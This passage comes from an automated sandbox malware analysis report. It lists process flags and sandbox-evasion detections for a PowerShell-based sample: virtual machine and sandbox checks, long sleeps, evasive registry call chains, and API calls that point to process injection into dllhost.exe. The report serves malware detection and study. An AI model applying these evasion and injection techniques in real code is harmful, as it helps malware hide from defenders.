Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dllhost.exe

Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,

38_2_0000000140001868

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC3EE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC3EE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: VBoxMiniRdrDN

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4320	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5554	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6009
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3777
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5837
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3190
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5007
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2046
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 456
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 403
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 379
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 373
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 1708
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 446
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 368
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 363

Found evasive API chain (may stop execution after accessing registry keys)

Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\cmd.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\winlogon.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

Found evasive API chain checking for process token information

Source: C:\Windows\System32\dllhost.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\System32\cmd.exe	API coverage: 4.5 %
Source: C:\Windows\System32\conhost.exe	API coverage: 8.0 %
Source: C:\Windows\System32\conhost.exe	API coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exe	API coverage: 9.1 %
Source: C:\Windows\System32\lsass.exe	API coverage: 9.4 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.1 %
Source: C:\Windows\System32\dwm.exe	API coverage: 9.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.3 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.5 %
Source: C:\Windows\System32\wbem\WMIADAP.exe	API coverage: 8.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.1 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208	Thread sleep count: 4320 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208	Thread sleep count: 5554 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6660	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1144	Thread sleep count: 6009 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1144	Thread sleep count: 3777 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1360	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6228	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5852	Thread sleep count: 5007 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 984	Thread sleep count: 2046 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5824	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 4428	Thread sleep count: 287 > 30
Source: C:\Windows\System32\dllhost.exe TID: 2484	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 6640	Thread sleep count: 456 > 30
Source: C:\Windows\System32\winlogon.exe TID: 6640	Thread sleep time: -45600s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 2344	Thread sleep count: 273 > 30
Source: C:\Windows\System32\svchost.exe TID: 4948	Thread sleep count: 403 > 30
Source: C:\Windows\System32\svchost.exe TID: 4948	Thread sleep time: -40300s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 1236	Thread sleep count: 201 > 30
Source: C:\Windows\System32\svchost.exe TID: 3616	Thread sleep count: 379 > 30
Source: C:\Windows\System32\svchost.exe TID: 3616	Thread sleep time: -37900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5448	Thread sleep count: 373 > 30
Source: C:\Windows\System32\svchost.exe TID: 5448	Thread sleep time: -37300s >= -30000s
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 3228	Thread sleep count: 1708 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 3228	Thread sleep count: 446 > 30
Source: C:\Windows\System32\svchost.exe TID: 6108	Thread sleep count: 368 > 30
Source: C:\Windows\System32\svchost.exe TID: 6108	Thread sleep time: -36800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5576	Thread sleep count: 363 > 30
Source: C:\Windows\System32\svchost.exe TID: 5576	Thread sleep time: -36300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1880	Thread sleep count: 300 > 30
Source: C:\Windows\System32\svchost.exe TID: 1880	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2124	Thread sleep count: 342 > 30
Source: C:\Windows\System32\svchost.exe TID: 2124	Thread sleep time: -34200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6024	Thread sleep count: 298 > 30
Source: C:\Windows\System32\svchost.exe TID: 3744	Thread sleep count: 322 > 30
Source: C:\Windows\System32\svchost.exe TID: 3744	Thread sleep time: -32200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3264	Thread sleep count: 323 > 30
